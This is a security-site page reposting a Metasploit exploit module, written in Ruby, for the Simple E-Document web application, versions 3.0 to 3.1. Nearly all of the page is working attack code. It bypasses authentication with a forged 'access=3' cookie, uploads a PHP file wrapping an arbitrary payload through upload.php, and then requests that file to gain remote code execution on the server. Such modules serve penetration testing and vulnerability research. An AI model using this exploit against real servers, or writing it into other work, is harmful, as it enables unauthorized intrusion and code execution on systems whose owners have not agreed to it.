首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Simple E-Document Arbitrary File Upload Exploit
来源:metasploit.com 作者:Coles 发布时间:2014-01-29  
##
# This module requires Metasploit: http//metasploit.com/download
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Simple E-Document Arbitrary File Upload",
      'Description'    => %q{
        This module exploits a file upload vulnerability found in Simple
        E-Document versions 3.0 to 3.1. Attackers can bypass authentication and
        abuse the upload feature in order to upload malicious PHP files which
        results in arbitrary remote code execution as the web server user. File
        uploads are disabled by default.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'vinicius777[at]gmail.com', # Auth bypass discovery and PoC, kinda
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          # This EDB uses SQLI for auth bypass which isn't needed.
          # Sending "Cookie: access=3" with all requests is all
          # that's needed for auth bypass.
          ['EDB', '31142']
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144 # 256k
        },
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        =>
        [
          # Tested on Simple E-Document versions 3.0 and 3.1
          [ 'Generic (PHP Payload)', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jan 23 2014',
      'DefaultTarget'  => 0))
  
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/'])
        ], self.class)
  end
  
  #
  # Checks if target allows file uploads
  #
  def check
    res = send_request_raw({
      'uri'    => normalize_uri(target_uri.path, 'upload.php'),
      'cookie' => 'access=3'
    })
  
    unless res
      vprint_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end
  
    if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/
      vprint_error("#{peer} - File uploads are disabled")
      return Exploit::CheckCode::Safe
    end
  
    if res.body and res.body.to_s =~ /Upload File/
      return Exploit::CheckCode::Appears
    end
  
    return Exploit::CheckCode::Safe
  end
  
  #
  # Uploads our malicious file
  #
  def upload
    @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
    php  = "<?php #{payload.encoded} ?>"
  
    data = Rex::MIME::Message.new
    data.add_part('upload', nil, nil, 'form-data; name="op1"')
    data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
    post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
  
    print_status("#{peer} - Uploading malicious file...")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'upload.php'),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'cookie'   => 'access=3',
      'data'     => post_data,
      'vars_get' => {
        'op' => 'newin'
      }
    })
  
    fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res
    fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404
    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/)
  
    print_good("#{peer} - Payload uploaded successfully.")
    register_files_for_cleanup(@fname)
  
    if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/
        @upload_path = normalize_uri(target_uri.path, "#{$1}")
        print_good("#{peer} - Found upload path #{@upload_path}")
    else
        @upload_path = normalize_uri(target_uri.path, 'in')
        print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'")
    end
  end
  
  #
  # Executes our uploaded malicious file
  #
  def exec
    print_status("#{peer} - Executing #{@fname}...")
    res = send_request_raw({
      'uri'    => normalize_uri(@upload_path, @fname),
      'cookie' => 'access=3'
    })
    if res and res.code == 404
      fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}")
    end
  end
  
  #
  # Just upload and execute
  #
  def exploit
    upload
    exec
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mp3info Stack Buffer Overflow
·Nitro Pro Remote Code Executio
·Ammyy Admin 3.2 - Authenticati
·Motorola SBG6580 Cable Modem &
·Daum Game 1.1.0.5 ActiveX (Ico
·Oracle Forms and Reports 11.1
·MW6 Technologies MaxiCode Acti
·PCMAN FTP 2.07 ABOR Command -
·MW6 Technologies DataMatrix Ac
·haneWIN DNS Server 1.5.3 - Buf
·MW6 Technologies Aztec ActiveX
·PCMAN FTP 2.07 CWD Command - B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved